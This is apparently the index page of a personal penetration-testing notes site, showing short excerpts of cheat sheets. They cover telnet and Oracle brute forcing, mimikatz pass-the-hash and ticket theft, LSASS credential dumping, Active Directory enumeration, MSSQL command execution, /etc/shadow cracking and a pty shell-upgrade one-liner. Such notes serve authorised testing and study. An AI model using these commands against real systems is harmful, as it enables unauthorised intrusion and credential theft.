akde/infosec

Information security is ultimately about managing risk


  • NTML infos nmap -p 23 --script telnet-ntlm-info $target Brute-force nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=passwords.txt,telnet-brute.timeout=5s $target hydra -P passwords.txt -L users.txt $target telnet -V hydra -C users_and_passwords.txt $target telnet -V


  • Local file inclusion and Wrappers Gen­er­al: If you try to read PHP and noth­ing returns — use a base64 return! Remote file inclusion PHP deserialization If a pro­gram accepts a seri­al­ized object which uses a mag­ic method, then… TODO, see here


  • Logon on another system with a NTLM hash Sce­nario: Then, use mimikatz to inject anoth­er user’s NTLM hash into the secret storage: Steal another user’s session Sce­nario: Then, with the use of mimikatz: privilege::debugsekurlsa::tickets /export This exports avail­able tick­ets into the work­ing direc­to­ry (suf­fix .kirbi). Then, choose one file/ticket from the cor­rect user and ser­vice. For…


  • Win­dows cre­ates and stores cre­den­tials in the Local Secu­ri­ty Author­i­ty Sub­sys­tem Ser­vice LSASS in the mem­o­ry. On the filesys­tem, the sam data­base stores the hashes. Use Mimikatz Usage Enable debug mode. This usess the SeDe­bug­Priv­i­lege so that we are able to com­mu­ni­cate with oth­er processes. privilege:debug Try to ele­vate priv­i­leges to obtain SYSTEM user privileges:…


  • Blood­Hound ana­lyzes and present Active Direc­to­ry Data. SharpHound is the data col­lec­tor which runs on a com­pro­mised AD system. On the target: On the own system:


  • Without shell access With shell access Choose one method to enumerate. 1. User and group enumeration with net (!) See what roles/privileges THIS USER has. Also localy. Maybe he/she has already admin­is­tra­tive privileges. whoami /all List (and store!) the users of the domain net user /domain List (and store!) infor­ma­tion like full names, group mem­ber­ships, etc.…


  • Col­lec­tion of privsec scripts. To start, upload PowerView.ps1 and: powershell -exec bypass PS> Import-Module .\PowerView.ps1 See the github site for all commands. General enumeration powershell -exec bypass PS> . .\PowerUp.ps1 PS> Invoke-AllChecks Or: powershell.exe -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks" About users Enu­mer­ates all users. Get-NetUser Enu­mer­ate all users which does not require Ker­beros preauth. Get-NetUser -PreauthNotRequired Returns…


  • Generic analysis tools Extract macros with oledump Use oledump.py to extract macros. List the file contents: python oledump.py $file Exam­ple from an output: ... 7: M 16267 'Macros/VBA/NewMacros' 8: m 932 'Macros/VBA/ThisDocument' ... To show details from a doc­u­ment part use the first num­ber and execute python oledump.py -s $no $file But to extract Macros,…


  • Main­ly post exploita­tion for AD envi­ron­ments. (Down­load — also includ­ed in Kali sources) Quick usage for privilege escalation General usage Metas­ploit syn­tax / PSE syntax Note: After use­mod­ule don’t for­get to go “back” and to “inter­act” with the agent to see job results! Com­mands with an aster­ix require a high-integri­ty Empire Agent. To upgrade one…


  • See the Impack­et site for a short descrip­tion of all tools. Tip: On Kali, use the com­mand impacket-* Enumeration without authentication Deter­mine the sys­tem architecture getArch.py -target $target Returns the lis­ten­ing RPC inter­face IDs. ifmap.py $target 135rpcdump.py $target Enumeration with half authentication Sce­nario: You have cre­den­tials for one AD user. Then, try to get all users for…


  • Overview Tom­cat usu­al­ly lis­tens on the fol­low­ing ports: 8080 — HTTP 8005 — Port for shut­ting down the Tom­cat serv­er; not inter­est­ing here 8009 — Same func­tions as the HTTP port, but via the Apache JServ pro­to­col AJP.  AJP is basi­cal­ly HTTP in a compressed/binary form. Checklist Check if /manager is accessible.  Default cre­den­tials are tom­cat / s3cret or…


  • In Ora­cle SQL, a SID (Ser­vice Iden­ti­fi­er) is basi­cal­ly a database. Enumeration Get gen­er­al information tnscmd10g -h $target Try to get a SID: tnscmd10g status-p 1521 -h $target Anoth­er tool: Ora­cle Scanner oscanner -s $target -P 1521 Metas­ploit module scanner/oracle/tnslsnr_version Brute force SID hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 $target oracle-sid nmap --script oracle-sid-brute -p 1521 $target Brute…


  • General tools Imaging tools dd, of course. Note that it makes sense to set the prop­er block size (some­times 4k, but most hard dri­ves are using 512), so that, when an error occued, the exact sec­tor is shown which can after­wards be skipped. dd if=/dev/sda of=/external/file.md5 bs=512 ewfacquire sudo ewfac­quire /dev/sda Advan­tages: aff4 advanced forensic…


  • General After bee­ing root, do the fol­low­ing to gain addi­tion­al information. Copy / break /etc/shadow or SAM Inves­ti­gate all /home direc­to­ries and /root ls -lahR /home/ Are there SSH keys?  Inves­ti­gate all data­bas­es and get / break their users and passwords Check cron­job­s/-tabs Enu­mer­ate programs  and deter­mine where cre­den­tials could be.  Enu­mer­ate the user’s mail Enu­mer­ate WWW directories…


  • Check also IDEs like Intel­liJ, Visu­al Stu­dio, Eclipse, …


  • Access­ing in Linux: impacket-mssqlclient Administrator:password@$target -windows-auth Default data­bas­es are: Enumeration Deter­mine version nmap -p 445 --script ms-sql-info $target Via metas­ploit auxiliary/scanner/mssql/mssql_ping Via Impack­et mssqlinstance.py $target Login brute force scanner/mssql/mssql_login When an account is known, enu­mer­ate for vulnerabilities auxiliary/admin/mssql/mssql_enum Exploitation Exe­cute commands auxiliary/admin/mssql/mssql_exec Get shell windows/mssql/mssql_payload Tools Com­mand line sqsh -U sa -P $password -S $target:1433 From Pow­er­Shell sqlcmd -S…


  • See https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 as a base64 cheat sheet. The clas­sic (base64 com­bines the bytes of the text and sep­a­rates 6 bit (2^6 = 64) and maps each 6 bit to a char­ac­ter. “=” means “two byte miss­ing”. For exam­ple, if the com­bined strings have 2 bit “left” (41.…), then (A==) echo Hi | base64 -d Con­vert hex…


  • From SANS660: “Fuzzing is not an attack; it is a fault-test­ing tech­nique.” Types are: Instru­ment­ed Fuzzing: “Mon­i­tor­ing” a sys­tem to learn how nor­mal inputs look like. No pre-knowl­edge of the sys­tem needed. Intel­li­gent uta­tion: A pro­to­col gram­mar which defines paths through all the code. Inputs are mutat­ed accord­ing to the grammar. Tools https://tools.kali.org/vulnerability-analysis/sfuzz See https://en.kali.tools/all/?category=fuzzer Sulley…


  • Enumeration Multiple


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';